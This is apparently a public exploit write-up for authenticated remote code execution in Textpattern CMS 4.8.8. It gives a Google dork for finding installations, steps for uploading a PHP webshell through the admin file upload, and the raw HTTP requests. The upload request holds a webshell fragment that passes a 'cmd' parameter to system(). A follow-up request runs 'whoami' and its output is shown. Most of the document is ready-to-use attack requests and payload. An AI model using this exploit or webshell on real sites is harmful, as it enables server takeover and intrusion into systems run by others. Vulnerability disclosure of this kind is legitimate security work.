# Exploit Title: Textpattern 4.8.8 - Remote Code Execution (RCE) (Authenticated) # Exploit Author: Alperen Ergel # Contact: @alpernae (IG/TW) # Software Homepage: https://textpattern.com/ # Version : 4.8.8 # Tested on: windows 11 xammp | Kali linux # Category: WebApp # Google Dork: intext:"Published with Textpattern CMS" # Date: 10/09/2022 # ######## Description ######## # # Step 1: Login admin account and go settings of site # Step 2: Upload a file to web site and selecet the rce.php # Step3 : Upload your webshell that's it... # ######## Proof of Concept ######## ========>>> START REQUEST <<<========= ############# POST REQUEST (FILE UPLOAD) ############################## (1) POST /textpattern/index.php?event=file HTTP/1.1 Host: localhost Content-Length: 1038 sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8" Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMgUEFltFdqBVvdJu X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/textpattern/index.php?event=file Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: txp_login=admin%2C94d754006b895d61d9ce16cf55165bbf; txp_login_public=4353608be0admin Connection: close ------WebKitFormBoundaryMgUEFltFdqBVvdJu Content-Disposition: form-data; name="fileInputOrder" 1/1 ------WebKitFormBoundaryMgUEFltFdqBVvdJu Content-Disposition: form-data; name="app_mode" async ------WebKitFormBoundaryMgUEFltFdqBVvdJu Content-Disposition: form-data; name="MAX_FILE_SIZE" 2000000 ------WebKitFormBoundaryMgUEFltFdqBVvdJu Content-Disposition: form-data; name="event" file ------WebKitFormBoundaryMgUEFltFdqBVvdJu Content-Disposition: form-data; name="step" file_insert ------WebKitFormBoundaryMgUEFltFdqBVvdJu Content-Disposition: form-data; name="id" ------WebKitFormBoundaryMgUEFltFdqBVvdJu Content-Disposition: form-data; name="_txp_token" 16ea3b64ca6379aee9599586dae73a5d ------WebKitFormBoundaryMgUEFltFdqBVvdJu Content-Disposition: form-data; name="thefile[]"; filename="rce.php" Content-Type: application/octet-stream "; $cmd = ($_REQUEST['cmd']); system($cmd); echo ""; die; }?> ------WebKitFormBoundaryMgUEFltFdqBVvdJu-- ############ POST RESPONSE (FILE UPLOAD) ######### (1) HTTP/1.1 200 OK Date: Sat, 10 Sep 2022 15:28:57 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 X-Powered-By: PHP/8.1.6 X-Textpattern-Runtime: 35.38 ms X-Textpattern-Querytime: 9.55 ms X-Textpattern-Queries: 16 X-Textpattern-Memory: 2893 kB Content-Length: 270 Connection: close Content-Type: text/javascript; charset=utf-8 ___________________________________________________________________________________________________________________________________________________ ############ REQUEST TO THE PAYLOAD ############################### (2) GET /files/c.php?cmd=whoami HTTP/1.1 Host: localhost sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: txp_login_public=4353608be0admin Connection: close ############ RESPONSE THE PAYLOAD ############################### (2) HTTP/1.1 200 OK Date: Sat, 10 Sep 2022 15:33:06 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 X-Powered-By: PHP/8.1.6 Content-Length: 29 Connection: close Content-Type: text/html; charset=UTF-8

alpernae\alperen

========>>> END REQUEST <<<=========